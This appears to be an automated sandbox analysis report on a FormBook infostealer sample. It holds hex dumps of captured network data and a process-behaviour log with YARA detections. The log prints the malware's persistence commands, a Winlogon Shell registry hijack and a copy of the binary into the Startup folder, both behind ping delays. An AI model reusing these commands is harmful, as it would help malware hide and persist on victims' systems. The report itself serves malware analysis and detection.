9e 9f e3 7e 1d 1b 1a 19 08 17 f7 34 67 11 53 11 07 ec 0e 0d 0c 0b 1a 09 f5 26 c5 07 45 03 0a 79 fe 7f ff fd ec fb e3 db 47 f4 b7 f5 e8 8b f3
                                                          Data Ascii: f_Q/OY/?&X7.p)~}|{jyjV5v5som|kDHd'ecaO]zyYW"USRQ?lHI0GEDCRA3M=};Z9765$3rn-\+)('6%r"~4gS&EyG
                                                          2022-02-07 11:04:19 UTC657INData Raw: 1c 6b 69 68 67 76 65 a4 22 d9 62 39 df bf 2a 5d 5b 5a 59 48 57 8a 14 26 53 f4 51 c3 2b 4e 4d 4c 4b 5a 49 b0 06 c2 42 e2 43 c2 a5 be bf 3f 3d 2c 3b 2e 7b b3 30 90 35 a0 d7 33 31 cf af 3f 2d 1c 69 73 2c 8e 27 8e c1 25 23 22 21 cf 9f 53 5f 8e 1c bc 19 6c a1 17 15 14 13 02 11 87 cd c9 08 aa 0b b6 ed 09 07 06 05 14 03 86 43 64 78 59 fd 28 1f fb f9 f8 f7 e6 f5 54 b1 57 f6 a9 6f 2f a5 ed eb ea e9 f8 e7 5a a7 ec e1 44 e1 f7 bb de dd dc db ca d9 00 95 e8 d1 72 d3 a6 d0 2e 4f cf cd dc cb 3e 8b a5 c7 60 c5 c4 26 c3 c1 3f 3f af bd ac f8 16 be 1e b7 f2 2a b5 b3 b2 b1 5f 2f 83 ee e4 ae 0c a9 bc 42 a7 a5 a4 a3 b2 a1 17 5c 2c 9a 3a 9b b2 7c 99 97 96 95 84 93 fb d2 d3 08 29 8d b0 6e 8b 89 88 87 96 85 15 c0 40 86 d9 ff 2b 98 7d 7b 7a 79 68 77 db 36 ba 74 d4 71 e7 0a 6e 6d
                                                          Data Ascii: kihgve"b9*][ZYHW&SQ+NMLKZIBC?=,;.{0531?-is,'%#"!S_lCdxY(TWo/ZDr.O>`&??*_/B\,:|)n@+}{zyhw6tqnm
                                                          2022-02-07 11:04:19 UTC661INData Raw: 3f e6 9a bd 91 e3 4e 5b 53 83 1f d9 03 da 40 89 4a d8 0d d0 71 8f 8c 42 16 ce 67 95 60 c4 11 c4 da 99 74 c2 1b c2 8a 61 23 b0 65 b8 04 e7 5b b5 7f b5 72 ed 0b b0 96 2c 0e f6 49 a6 73 aa 7e f9 4d a8 dd a7 5c ff b3 1b fe 99 94 c4 23 98 11 93 be ca 9e 97 fb 95 3a 0f 85 8d 0d 89 df 89 60 87 17 81 bc dc 93 8f 06 fb 61 6f e6 78 e3 7d 34 28 67 70 e5 77 27 2e 97 e1 1e 69 0e 34 da 68 19 63 0e 3a d4 62 13 65 ca df b7 5d cd 5f 34 06 46 59 c7 51 2f 0c 77 5f 0e cb d5 12 67 45 2b 4d 1d 47 4c 45 e5 47 dc 1e b5 bf 96 39 69 3b cd 3b a9 33 87 6a 06 3d 5b 35 74 f0 25 2d 4d 2a 12 76 39 29 47 24 ec 7c 1b 2f 4e 9b f3 42 ac 1a 03 1d ee 48 7d 12 85 17 ee 4e 5f 8e 6e 09 40 54 1b 0c 19 06 01 65 54 0d 0b 00 ef 1f a9 f3 e5 fa e3 99 a5 f9 d7 f4 e4 93 91 ff 26 6e dc b0 de ef 33 ea 50
                                                          Data Ascii: ?N[S@JqBg`ta#e[r,Is~M\#:`aox}4(gpw'.i4hc:be]_4FYQ/w_gE+MGLEG9i;;3j=[5t%-M*v9)G$|/NBH}N_n@TeT&n3P
                                                          2022-02-07 11:04:19 UTC665INData Raw: 2f 40 84 7d 6f 9b 91 2d c0 5c c1 e6 20 19 d3 6e 6f 44 1b b6 2f a1 00 eb 8a 25 f0 a9 d0 58 6a ac 27 3a df 28 8e 33 83 30 49 43 29 43 80 ec 55 83 cc a1 f0 e2 4c 78 2a bd 38 d6 be 2e fa d9 96 c3 48 42 89 27 8d 18 aa ff db dc 10 7f c2 83 c9 84 e0 6d 86 68 55 a4 15 37 d6 9c ac fb 3d 56 80 85 e8 04 21 8e 58 d4 fc e0 6e 14 e6 01 82 ee 68 e9 aa dc 3e eb 6d ec eb eb e9 e8 e7 e6 e5 e4 e3 e2 e1 1f 5f df dd d0 83 da d9 d8 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 39 ba c4 c3 c6 c1 3f 3f bf bd bc bb ba b9 b8 b7 b7 b5 a0 b3 b2 b1 4f 2f a5 ad ac ab aa a9 a8 a7 a6 a5 a4 a3 f8 a0 23 10 9f 9d 9c 9b 9e 99 98 97 96 95 94 93 92 91 6f 0f 8e 8d c3 8a 8a 89 88 87 82 85 84 83 82 81 7f ff 7f 7d 7c 7b 7b 79 e8 68 76 75 74 73 76 71 8f ef 6f 6d 6c 6b 6a 69 68 67 3c 64 ca 5f
                                                          Data Ascii: /@}o-\ noD/%Xj':(30IC)CULx*8.HB'mhU7=V!Xnh>m_/O9??O/#o}|{{yhvutsvqomlkjihg<d_
                                                          2022-02-07 11:04:19 UTC669INData Raw: e5 ae ee a1 b3 91 d6 bf a4 b9 93 81 5b 3b 9e a0 ae f8 f3 ad ae 91 b4 82 f7 8b 8b b0 0f 5a e9 d4 ce fa ba 8d e9 dc dc c0 84 e0 f7 e4 76 42 ed cf e0 c6 c2 90 c2 df c2 c1 f1 ea ec cc 2b 56 9f ae d8 f5 d3 ac ec ce c0 cd ee d2 fe d3 1e 6a d6 b4 cd ec f3 c7 de c5 eb b3 f2 c4 82 f1 05 94 1b 1c 37 13 34 0c 0f 40 39 12 3a 25 03 14 f6 ae 1c 08 23 21 12 50 23 13 27 65 29 37 0c 33 f5 aa 15 3f 6c 0c 0a 1a 31 05 00 6c 22 14 22 06 97 ba 35 74 20 11 3d 49 21 28 01 76 2f 2a 1b 36 cc 8b 5b 5c 57 5a 7c 7f 41 45 5c 72 5a 77 60 50 ab dd 7f 2d 42 78 6e 59 69 55 57 4b 47 66 1a 44 94 db 29 79 58 22 79 43 5e 71 6e 40 79 40 57 11 86 ed 6a 57 66 7b 72 5f 5f 69 54 57 31 61 47 59 a8 46 ab bc b9 b1 94 93 8a 86 a7 f5 9e 8b b7 ab 3e 06 a0 ac ae a0 ab d8 81 80 b4 b5 b2 8d b0 85 67 6e a8
                                                          Data Ascii: [;ZvB+Vj74@9:%#!P#'e)73?l1l""5t =I!(v/*6[\WZ|AE\rZw`P-BxnYiUWKGfD)yX"yC^qn@y@WjWf{r__iTW1aGYF>gn
                                                          2022-02-07 11:04:19 UTC673INData Raw: 31 35 63 12 3f 38 67 ea fc 08 19 15 1c 32 3b 30 23 1e 1f 06 0d 3b 24 fd bf 06 76 59 7a 76 5f 51 46 75 64 4d 5a 03 41 fa fd 48 43 76 13 59 7b 60 72 55 47 6a 23 6a 12 b5 a8 4d 6c 7e 5c 69 4b 74 5b 27 66 7c 5e 44 77 bf d7 5a 42 48 61 5a 73 60 07 43 73 61 6d 76 40 8d 18 8c fd 8a cf 88 ab cf 8f b5 a6 bf 9e 99 b4 6b 21 9e 95 a0 9a df 9d aa a9 b3 86 83 ac a1 e1 79 13 8f 84 86 af ad 8c 8b af 9a 93 a2 84 b3 b8 59 37 8b b8 9a 80 83 bd a5 be 83 c5 97 ba b1 b5 5a 52 91 ea d5 d5 de d6 cf c4 98 f3 db c1 df c2 4f 6b ce d9 cd ec d8 c0 cc f1 cf c0 d3 f1 cd d6 1c 70 f3 f1 f9 f8 ee f0 f7 f9 96 d1 f5 e7 f3 d6 1d 66 eb db e5 ee fd 89 ba b4 d7 b3 ec d9 e1 fb 4e 95 08 0a 2a 10 37 3a 30 3f 41 33 4d 1a 46 1e e0 b8 04 6d 28 0a 1e 08 2f 15 0f 01 32 0a 07 16 cd b0 28 5d 2f 2c 6c 18
                                                          Data Ascii: 15c?8g2;0#;$vYzv_QFudMZAHCvY{`rUGj#jMl~\iKt['f|^DwZBHaZs`Csamv@k!yY7ZROkpfN*7:0?A3MFm(/2(]/,l
                                                          2022-02-07 11:04:19 UTC677INData Raw: 91 b8 5c 20 ab b4 a3 b8 b8 a8 99 f2 f4 a3 88 8d 86 af 7e 3f ec 8d c9 e9 cf 80 ee cd da e7 d2 c7 db f9 18 44 e9 c0 fa ff f9 ca d0 d4 cf cc e2 a3 94 c5 33 5b da e4 de e1 fb c9 d3 d5 fc d4 d5 f0 f4 e6 57 3f ed fc ed f8 ef f8 d2 c6 86 c1 e5 e2 b4 b3 07 aa 14 36 0f 1f 20 3a 4d 03 2c 21 0c 1d 14 07 fb 82 08 37 1e 2a 6a 24 12 24 05 20 0c 2f 04 06 de 8d 2f 6b 10 23 6e 15 6f 16 01 19 00 12 33 17 ff b9 0e 4d 7e 04 24 0a 18 05 2d 23 77 02 2e 34 d3 cc 77 5a 44 4e 09 53 70 66 5c 0c 5a 03 46 31 a9 97 1e 49 15 78 18 6f 1b 57 12 69 71 70 17 13 92 a7 2b 4f 4f 54 79 71 7e 4d 58 15 4d 4b 77 4b 9c e9 44 34 4e 4c 7e 60 71 51 43 35 72 70 50 43 ca 2d 8d 85 b5 a3 a8 f9 bc a2 bd a2 81 96 9f 83 56 5b d6 bf a2 be a2 88 ae a0 d2 d3 dc 8c a4 a5 65 18 a8 dd 8c 8e b7 9d 9c b2 b7 e5 e5
                                                          Data Ascii: \ ~?D3[W?6 :M,!7*j$$ //k#no3M~$-#w.4wZDNSpf\ZF1IxoWiqp+OOTyq~MXMKwKD4NL~`qQC5rpPC-V[e
                                                          2022-02-07 11:04:19 UTC681INData Raw: 37 3e 7f 2c 26 10 04 1e 10 0e 30 77 0f f5 f2 66 77 7f 7c 62 57 52 0f 43 06 7d 33 61 45 ae cc 44 6b 5e 4a 47 4c 28 76 62 4a 75 15 5a 62 8b ee 79 5c 75 68 59 53 4d 55 23 25 55 5a 71 27 d9 ce 44 4e 0c 42 64 7f 69 6b 6f 61 4b 73 67 73 9e 0b 96 92 92 be 82 9a 9d 87 82 9c 9b 9d f2 be 78 37 bd ba 8d da 80 be a4 ac 8f a4 dd b2 d4 a5 2e 0f a8 ef 92 90 99 96 8f b5 d6 b8 e3 95 83 89 76 3a a6 81 f5 80 89 8e f1 b1 af 92 b0 8c a1 b3 7a 53 ec 8b fd fc ba f4 dd da d4 d0 c6 fa dc d7 20 2f f9 e7 ca 92 e8 f0 e1 e6 f7 d7 e3 d5 d5 90 3d 52 ec fa e6 f8 f6 ef f1 db dc f7 d8 93 ca eb 36 3f ea ec ce f2 c7 b8 ec d7 d4 ec c8 f1 cc c2 36 a5 46 45 4a 1a 2a 0b 31 77 13 24 38 1e 1f 42 e9 a8 22 08 59 2e 1b 20 2d 34 2d 0f 2d 36 08 34 c9 ed 6e 68 3b 5b 35 6e 60 32 31 11 26 15 23 62 ca 96
                                                          Data Ascii: 7>,&0wfw|bWRC}3aEDk^JGL(vbJuZby\uhYSMU#%UZq'DNBdikoaKsgsx7.v:zS /=R6?6FEJ*1w$8B"Y. -4--64nh;[5n`21&#b
                                                          2022-02-07 11:04:19 UTC684INData Raw: 63 6f 9c 88 98 b4 a3 87 9b 93 87 89 88 e3 85 84 6b 00 96 b3 af af bb b5 b4 b6 a2 bc bb bd 80 b4 48 26 bc b9 a9 b9 b3 99 a9 b3 ae c5 b7 a6 b6 9e 76 51 cc c9 dd d7 d6 d8 cc de d9 db e6 d6 d5 d8 3c 5b ca df d5 fb cb dd c0 a7 c1 c0 d0 fc eb cf 2c 6b fe f1 f0 fa ee f0 f7 f9 dd f0 ed dd f3 fc 0a 0f fc e8 f8 d4 c3 e7 fb f3 e7 e9 e8 e2 f6 e8 10 91 34 18 05 35 1b 14 1d 77 11 10 00 2c 3b 1f fc 9b 0e 01 00 0a 1e 00 07 09 22 0c 16 06 01 15 f0 ad 26 14 32 3f 3f 21 58 24 33 21 0b 1a 3c 22 db ae 23 21 2d 3f 23 26 26 03 2f 37 21 20 36 2e cd c6 76 53 58 5e 42 39 5f 52 42 6a 7d 5d 41 45 ae c3 43 4c 58 42 45 47 6e 4e 4a 40 6a 42 4f 44 df ec 7a 69 43 52 74 6a 6c 76 7a 79 75 67 7b 7e 81 c9 66 61 69 45 6b 64 6d 07 61 60 70 5c 51 75 9e 0d 8b 88 8c bd 95 95 9c 92 84 f5 87 96 86
                                                          Data Ascii: cokH&vQ<[,k45w,;"&2??!X$3!<"#!-?#&&/7! 6.vSX^B9_RBj}]AECLXBEGnNJ@jBODziCRtjlvzyug{~faiEkdma`p\Qu
                                                          2022-02-07 11:04:19 UTC689INData Raw: 06 0f 69 0f 02 12 3a 2a 02 0f 04 9f b0 2f 02 19 2a 2f 38 34 3e 22 2c 54 1e 33 25 c7 cf 02 2c 34 4b 1d 3b 21 33 23 45 05 20 36 28 c9 de 4b 52 4e 3b 7d 5c 4c 78 54 5f 51 50 46 67 ae c3 5a 48 2c 58 4f 5d 77 71 47 49 51 46 22 46 ba eb 40 4b 7d 77 6f 7c 18 45 73 73 71 61 77 7f 8c ea 4a 7c 79 6a 66 7a 08 60 63 71 5b 42 71 72 9a 12 9d 91 85 fb bd 9c 8c b8 94 9f 91 90 86 f1 5c 16 81 8e 84 99 85 87 81 9d 83 81 e4 a7 8b 93 7a 3c ab b2 ae a2 da 9e bd a3 92 bc a6 b6 b1 a5 40 3d a6 a8 bf cb 8f b1 a1 b4 b2 b6 c4 8a ac b5 6f 4b cd bd e6 de c8 d6 b8 e4 cf c6 c0 d6 df 9f 0c 40 dd c8 ac ee c4 dc c5 c2 d4 c4 c6 cf c7 a1 0c 66 ec e9 f9 f6 b4 d5 f1 f9 e7 95 d5 fd eb 91 26 61 fb be be 8b ed ec fc d8 cb ec ea ec f0 81 30 8f 1a 0f 1d 0f 15 0b 0b 77 35 1a 19 03 13 03 ea bc 1b 1f
                                                          Data Ascii: i:*/*/84>",T3%,4K;!3#E 6(KRN;}\LxT_QPFgZH,XO]wqGIQF"F@K}wo|EssqawJ|yjfz`cq[Bqr\z<@=oK@f&a0w5
                                                          2022-02-07 11:04:19 UTC693INData Raw: ee e5 e6 e2 f0 61 ba 42 da d4 dc d8 c8 80 ca 8e de c8 d7 d5 d2 d3 2e 5d 96 c5 ca cb cb db 81 d5 db cd c4 c2 d3 40 7e 2d 3e a4 b9 bb ba ab 39 f2 bd b5 b7 b2 a0 30 56 3d 9e bf 2d ee ad a9 a9 b5 27 84 b6 92 a4 a1 5e 07 8d 1c 81 9f 9a 98 90 8f 87 95 90 81 13 8c 7d 8e ae 9c 0d ae 9b 08 c1 96 07 c8 8d 83 80 80 6d 7f 8e 6c fd 2a 7f 79 78 65 f7 20 7c 73 70 70 9d 6e 36 70 69 62 6a 6b 69 75 e7 3c 75 e2 3f 68 9f dd 5e 4f dd 02 4b d8 39 50 56 54 49 56 40 d0 f6 c3 4f 4e 5e ca 2f 5b c9 12 5b 40 59 46 4f 41 bc ad be 54 2e 0a 28 b8 5d 26 b7 58 3e 33 36 30 dd 2e 46 30 29 23 22 2f 28 26 27 37 a5 4a 26 27 cd 1f b3 17 1c 1a 1b 0c 0a 97 df 17 08 0f 16 11 ee 8d 13 0f 0a 17 02 0f 1d 15 86 cc 06 1f 1e 05 df 7e fe ff f8 db fb f8 e4 f4 de f5 f6 f0 da f1 13 64 ef ef fe 6b 5f f8 69
                                                          Data Ascii: aB.]@~->90V=-'^}ml*yxe |sppn6pibjkiu<u?h^OK9PVTIV@ON^/[[@YFOAT.(]&X>360.F0)#"/(&'7J&'~dk_i
                                                          2022-02-07 11:04:19 UTC697INData Raw: 61 f6 df 30 5d 32 5b 5a 59 69 57 78 55 64 53 7c 51 9f cf 61 4d 7c 4b 4a 49 70 47 4e 45 45 43 03 41 cc bf 4c 3d 59 3b 57 39 5a 37 5a 35 4d 33 12 31 99 af 4a 2d 5e 2b 59 29 41 27 49 25 4a 23 22 21 ee 9f 31 1d 2c 1b 34 19 28 17 38 15 24 13 12 11 ef 8f 0f 0d 0c 0b 0a 09 08 07 06 05 04 03 02 01 ff 7f ff fd fc fb fa f9 f8 f7 f6 f5 f4 f3 f2 f1 0f af ed ed e0 eb ea e9 f8 dc e6 e5 e4 e3 e2 e1 1f 5f df dd dc db da d9 d8 d7 d6 d5 d4 d3 d2 d1 2f 4f cf cd cc cb ca c9 c8 c7 c6 c5 c4 c3 c2 c1 3f 3f bf bd bc bb ba b9 b8 b7 b6 b5 b4 b3 b2 b1 4f 2f af ad ac ab aa a9 a8 a7 a6 a5 a4 a3 a2 a1 5f 1f 9f 9d 9c 9b 9a 99 98 97 96 95 94 93 92 91 6f 0f 8f 8d 8c 8b 8a 89 88 87 86 85 84 83 82 81 7f ff 7f 7d 7c 7b 7a 79 78 77 76 75 74 73 72 71 8f ef 6f 6d 6c 6b 6a 69 68 67 66 65 64 63
                                                          Data Ascii: a0]2[ZYiWxUdS|QaM|KJIpGNEECAL=Y;W9Z7Z5M31J-^+Y)A'I%J#"!1,4(8$_/O??O/_o}|{zyxwvutsrqomlkjihgfedc


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:12:02:43
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Hesab#U0131 Onaylay#U0131n.exe"
                                                          Imagebase:0x10000
                                                          File size:528896 bytes
                                                          MD5 hash:7600223383061FAB23F27E42C7CF74C6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.360269598.0000000003CB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Target ID:12
                                                          Start time:12:03:13
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c ping 127.0.0.1 -n 13 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,
                                                          Imagebase:0xd80000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:13
                                                          Start time:12:03:14
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:14
                                                          Start time:12:03:14
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 13
                                                          Imagebase:0xa80000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:15
                                                          Start time:12:03:15
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\java.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\java.exe"
                                                          Imagebase:0xa00000
                                                          File size:528896 bytes
                                                          MD5 hash:7600223383061FAB23F27E42C7CF74C6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.425092835.00000000048D9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Target ID:17
                                                          Start time:12:03:27
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe,"
                                                          Imagebase:0xb60000
                                                          File size:59392 bytes
                                                          MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:21
                                                          Start time:12:03:46
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\user\AppData\Local\Temp\java.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          Imagebase:0xd80000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:23
                                                          Start time:12:03:47
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:24
                                                          Start time:12:03:47
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 12
                                                          Imagebase:0xa80000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:28
                                                          Start time:12:04:02
                                                          Start date:07/02/2022
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping 127.0.0.1 -n 12
                                                          Imagebase:0xa80000
                                                          File size:18944 bytes
                                                          MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Target ID:30
                                                          Start time:12:04:10
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe"
                                                          Imagebase:0x880000
                                                          File size:528896 bytes
                                                          MD5 hash:7600223383061FAB23F27E42C7CF74C6
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.592270936.000000000453F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001E.00000002.592449978.00000000045B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe, Author: Florian Roth
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 28%, ReversingLabs
                                                          Reputation:low

                                                          General

                                                          Target ID:31
                                                          Start time:12:04:14
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.exe
                                                          Imagebase:0xd10000
                                                          File size:528896 bytes
                                                          MD5 hash:7600223383061FAB23F27E42C7CF74C6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.592834200.000000000499F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.593184990.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Target ID:33
                                                          Start time:12:04:51
                                                          Start date:07/02/2022
                                                          Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                          Imagebase:0xf00000
                                                          File size:42080 bytes
                                                          MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000002.655660259.0000000001BF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000021.00000000.558484436.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000021.00000000.558921224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
